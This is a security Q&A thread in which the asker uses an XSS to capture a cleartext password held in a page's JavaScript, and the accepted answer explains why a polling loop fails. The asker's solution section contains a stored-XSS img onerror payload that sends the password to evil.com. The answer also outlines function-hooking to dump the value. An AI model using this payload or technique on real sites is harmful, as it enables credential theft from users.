# Access to a js variable which visible for a brief period of time via XSS

Tags: web-applications, xss, javascript

If I put a breakpoint on a Javascript function when I visit a web page and I examine a JS variable that variable contains the cleartext password just for a brief period of time.

I found an XSS and I want to access to the content of that variable I'm trying the following

```
var i; for(i=1;i<10000;i++){
     if(typeof cleartext_password !== 'undefined')
         { cleartext_password;}
}
```

Anyway it seems the loop doesn't iterate, I just see in the console 4 "undefined reference" errors.

What am I missing?

**SOLUTION**

I opted for the clean solution as suggested by CBHacking in his answer.
The password was stored in clear within the DOM. I was able to leverage a stored XSS to exfiltrate the password as follows:

```
<img src=x onerror="this.onerror=null;this.src='http://evil.com?mmmh='+window.vuln_name.clear_textpassword>
```

Answer (score 3, accepted):

The obvious answers:

- a loop that tight, with only 10k iterations, will complete in milliseconds at most, assuming it's not optimized out entirely (since state never changes within it, that would be a fair thing for the optimizer to do)
- if `cleartext_password` isn't in scope for your little loop then it will never have any value to read; your breakpointed function's local variables are probably not accessible from your XSS payload
- JS is single-threaded and doesn't preempt other code; your loop and the function that temporarily populates the variable will never execute at the same time, or even interleave execution (neither can start until the other finishes)

The ugly-hack solution: write your own version of the relevant JS function (the one you're breakpointing) with extra code that dumps the password to somewhere persistent, and/or remove the `delete` call (if there is one) that erases the variable. Replace the legit function with your modified version (this might require additionally replacing functions that create / define the breakpointed code, depending on how that function is defined and whether it's stored in a visible variable).

The actually good solution: read the function you're breakpointing to see where the `cleartext_password` variable gets set, and where the function gets its value from (obvious candidates are the DOM, local storage, or an XHR/`fetch` call to the server).  Just execute the same operation (DOM lookup, local storage read, XHR/fetch request, etc.) to retrieve the value directly.

Comment: I updated my question with the answer based on your advices. The fact that the password was stored in a dom element in cleartext should be considered a weakness from a security perspective?

Comment: @Maicake a password has to be stored *somewhere*. Even if you have a desktop app and you write the password in a field, it's going to be a text somewhere in the application. I'm not sure how you expect an application to work with a password without having a password.

Comment: I expect something like this. The user inserts the password, the password is sent to the server encrypted , the server check the password and send a session cookie to the user. So I don t see the need to keep the password in the Dom after the initial autentication.

Comment: Keeping a password after the initial authentication is certainly bizarre, and generally not needed (I can think of cases where you might do that but they're generally around handling a password for a third-party service). You didn't specify that this was post-authentication, though; generally if you're trying to steal a password via XSS, it's on the login page as the user authenticates. I'm guessing this is some "toy" example for training or a test?